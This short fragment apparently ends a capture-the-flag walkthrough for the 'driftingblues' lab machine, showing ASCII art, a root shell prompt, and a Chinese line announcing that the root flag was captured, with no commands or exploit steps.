█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
root@driftingblues:~#
成功拿到了root flag!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
